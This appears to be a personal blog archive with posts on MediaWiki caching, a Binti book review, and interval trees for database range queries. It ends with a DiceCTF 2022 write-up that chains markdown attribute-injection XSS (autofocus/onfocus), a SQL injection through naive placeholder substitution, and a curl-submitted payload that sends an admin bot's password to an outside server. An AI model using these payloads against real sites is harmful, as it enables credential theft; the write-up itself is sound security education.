To balance these competing concerns, Quick InstantCommons uses an adaptive cache. If the image has existed for a long time, we cache for a day (configurable). After all, if the image has been stable for years, it seems unlikely it is going to be edited in very soon. However, if the image has been edited recently, we use a dynamically determined shorter time to live. The idea being, if the image was edited 2 minutes ago, there is a much higher possibility that it might be edited a second time. Maybe the previous edit was vandalism, or maybe it just got improved further.

As the cache entry for an image begins to get close to expiring, we refetch it in the background. The hope is that we can use the soon to be expired version now, but as MediaWiki is processing other things, we refetch in background so that next time we have a new version, but at the same time we don't have to stall downloading it when MediaWiki is blocked on getting the image's information. That way things are kept fresh without a negative performance impact.

MediaWiki's built-in instant commons did support caching, however it wasn't configurable and the default time to live was very low. Additionally, the adaptive caching code had a bug in it that prevented it from working correctly. The end result was that often the cache could not be effectively used.

Missing MediaHandler Extensions

In MediaWiki's built-in InstantCommons feature, you need to have the same set of media extensions installed to view all files. For example, PDFs won't render via instant commons without Extension:PDFHandler.

This is really unnecessary where the file type just renders to a normal image. After all, the complicated bit is all on the other server. My extension fixes that, and does its best to show thumbnails for file types it doesn't understand. It can't support advanced features without the appropriate extension e.g. navigating in 3D models, but it will show a static thumbnail.

Conclusion

In the end, by making a few, relatively small changes, we were able to improve the performance of instant commons significantly. 980 times as fast!

Do you run a MediaWiki wiki? Try out the extension and let me know what you think.

Footnotes:

¹ This is assuming default settings and an [object] cache miss. This may be different if $wgResponsiveImages is false in which case high-DPI images won't be fetched, or if apiThumbCacheExpiry is set to non-zero in which case thumbnails will be downloaded locally to the wiki server during the page parse instead of being hotlinked.


² This role actually rotates between the Virginia & Texas data center. Additionally, the Texas DC (when not primary) does do some things that the caching DCs don't that isn't particularly relevant to this topic. There are eventual plans to have multiple active DCs which all would be able to respond to the type of API queries being made here, but they are not complete as of this writing - https://www.mediawiki.org/wiki/Wikimedia_Performance_Team/Active-active_MediaWiki


³ The MediaWiki API actually supports an smaxage=<number of seconds> (shared maximum age) url parameter. This tells the API server you don't care if your request is that many seconds out of date, and to serve it from varnish caches in the local caching data center if possible. Unlike with normal Wikipedia page views, there is no cache invalidation here, so it is rarely used and it is not used by instant commons.





Friday, July 8, 2022

Book review: Binti

 I've never written a book review before, but what is a blog if not a platform to give your uninformed opinion to people who don't care about it :)


Recently I read the novella Binti by Nnedi Okorafor. I had recently saw it on the shelf at the library and I remembered it being pretty popular back when it was released, so thought i would give it a go. Overall, i liked it up to the ending, which I strongly disliked.

In general, it seemed like a fun coming of age/space opera-esque story. You have a main character who is an outsider and unsure of herself. Due to circumstances beyond her control she is thrust into the middle of interplanetary conflict which only she can resolve due to unique traits which originally had marked her as an outsider.

None of this is particularly ground breaking - I have read many stories with that type of plot structure - but it still makes for a fun story. The weird part here, is I don't think this is the type of story that the author intended to write. From what I remember of this book's release, the selling point was supposed to be how it explored the main character's culture (Which from what I understand is based on the real human culture of the Himba people). However, to me, that seemed like the most weak and superficial part of the book. All we really get, is that they don't like outsiders, and use an ointment made of mud that is very culturally important. We get very little in terms of why this is meaningful to the character, or how it affects her worldview, etc.

Its a reasonably common theme to explore "culture" in science fiction works. Admittedly, it is somewhat rarer but definitely not unheard of to explore it as an end in itself. More common is to have an alien culture to juxtapose against contemporary mainstream culture to make some point about the mainstream culture of the context the writer is writing in. Novels such as The Dispossessed and Stranger In A Strange Land come to mind as novels that posit some alien culture to contrast it with contemporary culture. Other times alien characters have a unique culture to provide an aesthetic of otherness for them. Consider how boring most aliens in star trek are compared to the Klingons that have a much better developed cultural back story. Or how alien the aliens feel in the Lilith's Brood series. Even if the cultural exploration is arguably not the primary point to these novels, the cultures they explore feel rounded and fleshed out. The cultural depiction in Binti seems flat comparatively, because even if its tied to a real culture, it was barely explored in the novella.

Ultimately I felt like this novella worked as a fun space adventure; it didn't work as an interesting cultural exploration.

Last of all the: The ending [Major spoilers ahead]

The ending ruined the book for me. It did not make sense in terms of character logic nor character emotion.

Basically - the aliens, who are very isolationist, are mad because the university stole the stinger of one of their leaders to display as an artifact. So they decide to murder everyone on a ship full of students in order to sneak in and retrieve it (or die trying). The situation is resolved by the university saying sorry, claiming that doing such a thing was against policy, and the appropriate people will be punished. Additionally one of the aliens was invited to be an exchange student.

To me, this felt just one step above, "it was all a dream". It makes no sense how the university could accidentally have obtained the artifact without realizing it was unethically sourced. Some researchers just show up with an alien body part, from aliens who generally refuse to talk to outsiders, and everyone just assumed the alien gave consent for this? It is difficult to reconcile these plot points together logically, unless the university was intentionally turning a blind eye, in which case, why would their apology be accepted? Second, nobody was at all upset that everyone on the ship was slaughtered. I could understand maybe letting bygones be bygones for the greater good - but they should at least be a little sad about it. Nobody seemed to care at all.

In conclusion: Generally fun plot. The "cultural" aspects were superficial and overrated. Ending sucked.






Sunday, May 1, 2022

Finding if an item is a list of ranges stored in a DB

 Recently, I've decided to experiment with making a reporting extension for MediaWiki (Working name "Sofa") as a side project. There are already several options already in this space, notably Cargo, Semantic MediaWiki (SMW) and DynamicPageLst (DPL). However, I think the design space is still a little under explored. My goal is to experiment with some rather different design choices, and see what I end up with. In particular - I want to make one that respects the core wiki philosophy of "quick" - e.g. changes are reflected immediately, and "soft-security", where nothing users can do, whether accidentally or maliciously, cause any (performance) harm but can simply be reverted. Current solutions often require manual cache purging to see changes reflected and can have unpredictable user-dependent performance characteristics where subtle user choices in extreme cases could even cause a DB overload.

I don't want to talk too much about the new extension generally, as that's not what this blog post is about and I am still in the early stages. However one design requirement that left me in a bit of a conundrum is the automatic cache purging one. In the model for this extension, we have ordered lists of items and pages that display a range of items from the list. In order to support cache purging when someone adds a new entry that would appear in a used range, we need some way to store what ranges of items are used by what pages so that given a specific item, we can query which pages use a range containing that item. This turned out to be surprisingly difficult. I thought I'd write a post about the different methods I considered. 

The naive approach

For example we might have the following list of alphabetically ordered items

iditem
17Alpha
12Atom
21Beta
34Bobcat
8Bonsai Tree

And a page might want to include all items between Amoeba and Bobcat (Note that Amoeba is not actually in the list).

In this example, we need someway to record that the page is using items between Amoeba and Bobcat, so if someone inserts Badger into the list, the page using the list gets refreshed.

The natural way of doing this would be a MariaDB table like the following:

list_cache table
idpage_idlist_startlist_end
11234AmoebaBobcat

Along with 2 indicies: one on list_start and the other on list_end.[1]

In the event Badger gets added to the list, we would need to query what pages to refresh. In this structure we would use a query like: SELECT page_id FROM list_cache WHERE "Badger" BETWEEN list_start AND list_end; 

This all works. However there is one problem, to answer that query the DB has to look at a number of rows beside the rows we're interested in. For best performance, we ideally want to make the database look at as few rows as possible to answer our query. Ideally it would only look at rows that are relevant to the answer.

An index in the database is an ordered list of rows from a table - like a phonebook. In this case we have two - one for the start of the range and one for the end. In essence we want information from both, however that's not how it works.

"'badger' BETWEEN list_start AND list_end" is really just a fancy way of saying list_start < 'badger' AND list_end > 'badger'. The RDBMS then has a choice to make: It can use the list_start index, go to the spot in that index where badger would be, and then work its way down to the bottom of the list, checking each row individually for if the second condition is true. Alternatively it can pull up the list_end index and do the same thing but reversed.

However, once it picks an index and goes to it starting place, it has to look at every entry until it hits the beginning (Respectively end) of the index. If the starting place is in the middle of the index, it would have to look at roughly half the rows in order to answer the query. If this system was used at scale and the table had 2 million rows, the database might have to look at a million rows, just to find the 3 that are matching. This is definitely not ideal

 

[1] Potentially you could do a compound index on (list_start,list_end) and (list_end,list_start) instead which allows the DB to look directly at the index instead of constantly looking up each row in the underlying table. I'm unclear on if the benefit of index-condition-pushdown outweighs the increased index size, I suspect it would mildly, but either way things are still rather inefficient.

Interval trees

At this point, like any good programmer, I started googling and trawling stack overflow. Eventually I stumbled upon the article "A Static Relational Interval Tree" by Laurent Martin on the SolidQ blog.

At first glance this seemed the exact solution I was looking for. On second glance - not so much. This is a really cool technique; unfortunately it scales with the number of bits needed to represent the data type you are using. If I was looking at ranges of integers, dates or IP addresses, this would be perfect. Unfortunately I am using strings which take a large number of bits. Nonetheless, I'm going to describe the technique, as I think its really cool, and should be more widely known.

The core idea, is to separate the different ranges into a number of buckets. Each bucket can be queried separately but efficiently - Any row that the DB has to look at, is a row that would match the query. In order to find all the ranges that contain a specific point, you just need to query all the applicable buckets. The number of buckets that are applicable in the worst case is the same as the number of bits needed to represent the data type (hence the applicability to ranges of ints but not long strings).

The end result is: if you are using ranges of 32-bit integer, you would have to do 32 really efficient separate queries (or 1 query after UNIONing them together). For a large DB, this is much better than 1 inefficient query that might read millions of rows or more.

For simplicity, in the explanation I will use 4 bit integers (0-16).

Buckets

So, what are these buckets? They are simply the shared binary prefix of the two ends of the range with a 1 followed by 0's appended to fill out the rest of the binary number. Here are some examples:

Range startRange endShared prefixBucket
10 (1010b)13 (1101b)112 (1100b)
9 (1001b)10 (1010b)1010 (1010b)
9 (1001b)9 (1001b)10019 (1001b)

In the database, we can use virtual columns to have mariaDB manage this for us, using the formula range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2)))

CREATE TABLE ranges (
    id int unsigned PRIMARY KEY AUTO_INCREMENT,
    range_start int NOT NULL,
    range_end int NOT NULL,
    bucket int as (range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2))))
);
CREATE INDEX start on ranges (bucket, range_start);
CREATE INDEX end on ranges (bucket, range_end);

Now we can just insert things like normal, and MariaDB will take care of calculating the bucket number.

Querying

This has the following useful property: Any range assigned to bucket number n must contain the value n. For example, bucket 12 might have the range [10,13] in it, or [12,12], all of which contain the point 12. It would not be able to have the range [10,11] as that does not go through the point 12.

This is useful, since if we have a specific number of interest, we can easily query the bucket to see if it is in there. For example, if we wanted to know all the ranges in bucket 12 containing 9, we can query WHERE bucket = 12 AND range_start <= 9; since if a range is in bucket 12, it must contain the value 12, so any range that starts before or equal 9, must go through 9 in order to get to 12. If we have an index on (bucket, range_start), this is a really efficient query that will only look at the rows that are of interest. Similarly, if the number of interest is greater than the bucket number, we do the same thing, just with range_end >= instead.

Now that we know how to get all the relevant ranges from one bucket efficiently, we just need to figure out what all the relevant buckets are, and we have a solution (remembering that at most log of the data type number of buckets need to be consulted).

Finding the buckets

To find the buckets, we simply take the first x bits of the binary representation and append 1 followed by 0s to fill out the number, for all x.

For example, if we wanted to find all the buckets that are relevant to ranges containing 9 (1001b):

buckets that can contain 9 (1001b)
bits maskedprefixbuckettop or bottom
0
8 (1000)top
11b12 (1100)bottom
210b10 (1010)bottom
3100b9 (1001)top (either)

We would have to look at buckets 8,12,10 and 9. If the bit immediately after the prefix is a 1 (or equivalently if our point >= bucket) we have to look at the top of the bucket, otherwise, we look at the bottom. By this, we mean whether the query is range_end <= point or range_start >= point respectively.

So with that in mind, in our example we would make a query like:

SELECT id, range_start, range_end FROM ranges WHERE bucket = 8 and range_end <= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 12 and range_start >= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 10 and range_start >= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 9 and range_end <= 9;

Which is a union of queries that each individually are very efficient.

To generate this, you might use code like the following (in php):

define( "MAX_BITS", 4 );
function makeQuery ( $target ) {
	$mask = 0;
	$query = '';
	for ( $i = MAX_BITS-1; $i >= 0; $i-- ) {
		$mask = $mask | (1>>$i);
		$tmpMask = $mask ^ (1>>$i);
		$pad = 1 >> $i;
		$bucket = ($target & $tmpMask) | $pad;

		$query .= "SELECT id, range_start, range_end FROM ranges WHERE bucket = $bucket ";
		if ( $target < $bucket ) {
			$query .= "AND range_start >= $target ";
		} else {
			$query .= "AND range_end <= $target ";
		}
		if ( $i != 0 ) {
			$query .= "\nUNION ALL ";
		}
	}
	return $query . ";";
}

 

 

Tuesday, February 8, 2022

Write up for DiceCTF 2022: nocookies

Last weekend I participated in DiceCTF. There was some very interesting challenges and I had a lot of fun. Here is a write-up for one of the challenges I solved.

For this challenge, we're presented with a note-keeping app. It allows storing either plaintext or markdown notes. The main distinction is instead of using cookies, it just asks you for a password on every page load.

The admin bot

The challenge also includes an admin bot, that you can give urls to, to visit. Here is a snippet from its code:

    // make an account
    const username = Array(32)
      .fill('')
      .map(() => Math.floor(Math.random() * 16).toString(16))
      .join('');
    const password = flag;

    const firstLogin = doLogin(username, password);

    try {
      page.goto(`https://no-cookies-${instance}.mc.ax/register`);
    } catch {}

    await firstLogin;

    await sleep(3000);

    // visit the note and log in
    const secondLogin = doLogin(username, password);

    try {
      page.goto(url);
    } catch {}

    await secondLogin;

As we can see from the bot code. It creates an account with a random username, and the password being the flag which we are trying to obtain. Since it first visits one page, and then a second of our choosing, this is a strong hint that the intended solution is some sort of XSS to exfiltrate the password.

The view code

Since I suspected that we were looking for an XSS, and I knew the app supported markdown, a good first place to look was the markdown rendering code. This happened entirely client-side on the view note page. Here is the relevant snippet, with important parts bolded.

<script>
  (() => {
    const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

    const promptValid = (text) => {
      let result = prompt(text) ?? '';
      return validate(result) ? result : promptValid(text);
    }

    const username = promptValid('Username:');
    const password = promptValid('Password:');

    const params = new URLSearchParams(window.location.search);

    (async () => {
      const { note, mode, views } = await (await fetch('/view', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          username,
          password,
          id: params.get('id')
        })
      })).json();

      if (!note) {
        alert('Invalid username, password, or note id');
        window.location = '/';
        return;
      }

      let text = note;
      if (mode === 'markdown') {
        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

        text = text.replace(/#\s*([^\n]+)/g, (match, p1) => {
          return `<h1>${p1}</h1>`;
        });
        text = text.replace(/\*\*([^\n]+)\*\*/g, (match, p1) => {
          return `<strong>${p1}</strong>`;
        });
        text = text.replace(/\*([^\n]+)\*/g, (match, p1) => {
          return `<em>${p1}</em>`;
        });
      }

      document.querySelector('.note').innerHTML = text;
      document.querySelector('.views').innerText = views;
    })();
  })();
</script>
 

The first thing I was drawn to was this part:

        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

Which looks for syntax like (Link text)[https://urltolinkto.com] and replaces it with a link. A keen eye would notice that the url is allowed to contain double quotes ("), which don't get escaped. This allows you to make extra attributes on the <a> tag. For example (link text)[http://example.com" class="foo] gets turned into <a href="http://example.com" class="foo">link text</a>. This can be used as an XSS by using html event handlers. For example, (link)[https://example.com" onmouseover="alert`1`]. Will make an alert box if you hover over the link with your mouse.

A lack of user interaction 

However, the admin bot doesn't have a mouse, and doesn't interact with the page. So how do we make the xss trigger? We can't tell it to hover over the link

This took me a little while, because I was testing on firefox, but the admin bot uses chrome, and the behaviour is mildly different. Eventually though, I found out that in chrome you can use the autofocus attribute to force focus to the element, and use an onfocus handler to execute code:

(foo)[http://example.com" autofocus=autofocus onfocus="alert`1`]

This will pop the alert box immediately on page view, including for the admin bot

Problem solved right? Wait...

With that, I had assumed I had solved the problem. All I had to do was read the password variable, and send it off to a webserver I control.

So to check if that would work, first I tried:


(foo)[http://example.com" autofocus=autofocus onfocus="alert(password&#x29;]

Note: The ) had to be escaped as &#x29; because the regex stopped at first ")"

...and got a pop-up saying "undefined". Whoops looking back at the view code, I see that const password, is defined in an anonymous arrow function, and my code is executing outside of it (Since its coming from an HTML event handler) so the password variable is not in scope.

At this point, I got stumped for a little bit.

Looking back at the code, I noticed that it was validating the password a bit weirdly

     const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

It was basically checking that the password has at least 1 character, and does not contain apostrophes or dollar signs. Which is just a bit random. If this was actually important you would do it on the server side. In a CTF, one of the key things to do is look for code that stick out or code that looks like something you wouldn't normally write if writing software. This validate function looked a bit suspicious to me, although to be honest, I only thought that because I was fairly stuck at this point.

 I had a vague memory of early JS having some weird design choices around Regexes. So I decided to read up on RegExp in Javascript. Eventually I found this page https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input which was very relevant to the matter at hand.

 In short, whenever you run a regex in javascript, JS saves the text you ran it on as a static class property, and you can access it later by looking at RegExp.input.

 This is first of all crazy (Thanks JS). However, it seemed perfect for this situation. I assumed that since the password was the last thing .test() was ran on, I could obtain it from RegExp.input

However, there was a problem. All the .replace() calls from the markdown parsing also set RegExp.input overriding the password. It seemed like I was at an impasse.

The app did support plaintext notes, which wouldn't run the problematic .replace() calls. If I could somehow get an XSS in a plaintext note, then I could use the RegExp.input trick

Perhaps the markdown XSS I found was a red herring, and I needed to look elsewhere.

 On to an SQL injection

Looking at the view code, if the note is a plaintext note, then it is inserted directly into the document without any escaping on the client side. All the escaping takes place on the backend at insert time. Lets take a look at the backend code:

 const db = {
  prepare: (query, params) => {
    if (params)
      for (const [key, value] of Object.entries(params)) {
        const clean = value.replace(/['$]/g, '');
        query = query.replaceAll(`:${key}`, `'${clean}'`);
      }
    return query;
  },

[...]
  run: (query, params) => {
    const prepared = db.prepare(query, params);
    console.log( prepared );
    return database.prepare(prepared).run();
  },
};

[...]

  db.run('INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)', {
    id,
    username,
    note: note.replace(/[<>]/g, ''),
    mode,
  });

 

 As you can see, at insert, the app strips < and > when inserting a note in the DB. It doesn't seem like there's any way to get an XSS past that filter.

However, the prepare function has a flaw that lets us manipulate how SQL queries are generated in general.

The prepare function replaces keys like :note with their escaped values one at a time. However, it doesn't check whether the parameter value contains a replacement identifier itself. For example, if your username is :note, the SQL query will become messed up after :note gets replaced in the replacement.

As an example, consider how the following query would be prepared:

db.run( 'INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)',
  {
    id: "12345",
    username: ":note",
    note: ', :mode, 22, 0)-- ',
    mode: '<img src=x onerror="alert(RegExp.input)">',
  }

Lets run through what would happen when preparing this query.

We start with:


INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)

We replace :id with '12345'

INSERT INTO notes VALUES ('12345', :username, :note, :mode, 0)

We replace :username with ':note'

 INSERT INTO notes VALUES ('12345', ':note', :note, :mode, 0)

We replace :note with ',:mode, 22, 0)-- '

 INSERT INTO notes VALUES ('12345', '', :mode, 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

We replace :mode with '<img src=x onerror="alert(RegExp.input)">'

 INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

Note that -- is the SQL comment character, so the end result is effectively:

  INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0);

 bypassing the XSS filter.

Success

In the end we have inserted a plaintext note containing malicious javascript (Any note that has a mode which is not 'markdown' is considered plaintext).  I visited the page, and I got a pop-up with my password.

Now all we need to do is make a payload that instead of showing the password in an alert box, exfiltrates the password to us.

I pre-registered an account with username ":note" and passwored "password". I then created a note with the following curl command:

$ curl 'https://no-cookies-0ac0b52c95f3abe3.mc.ax/create' -H 'Content-Type: application/json' --data-raw '{"username":":note","password":"password","note":",:mode, 22, 0)-- ","mode":"<img src=x onerror=\"window.location=&quot;https://bawolff.net?&quot;+RegExp.input\">"}'


{"id":"32e8c795bb8b44b74d52d74e261a2942"}

 
 I then input the view url to the admin bot service, waited for the admin bot to visit it and watched my webserver log. Sure enough, I soon saw:

34.139.106.105 - - [06/Feb/2022:08:52:49 +0000] "GET /?dice{curr3nt_st4t3_0f_j4v45cr1pt} HTTP/1.1" 200 5514 "https://no-cookies-0ac0b52c95f3abe3.mc.ax/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4855.0 Safari/537.36" 

Thus the flag is dice{curr3nt_st4t3_0f_j4v45cr1pt} 

 

p.s. I hear that RegExp.input isn't the only possible solution. I definitely was not able to think of something like this, but I heard some teams used a really ingenious solution involving replacing the document.querySelector, JSON.stringify functions and re-calling the inner async anon function so that the attacker controlled replaced JSON.stringify function gets called with the password. Which is an absolutely beautiful exploit.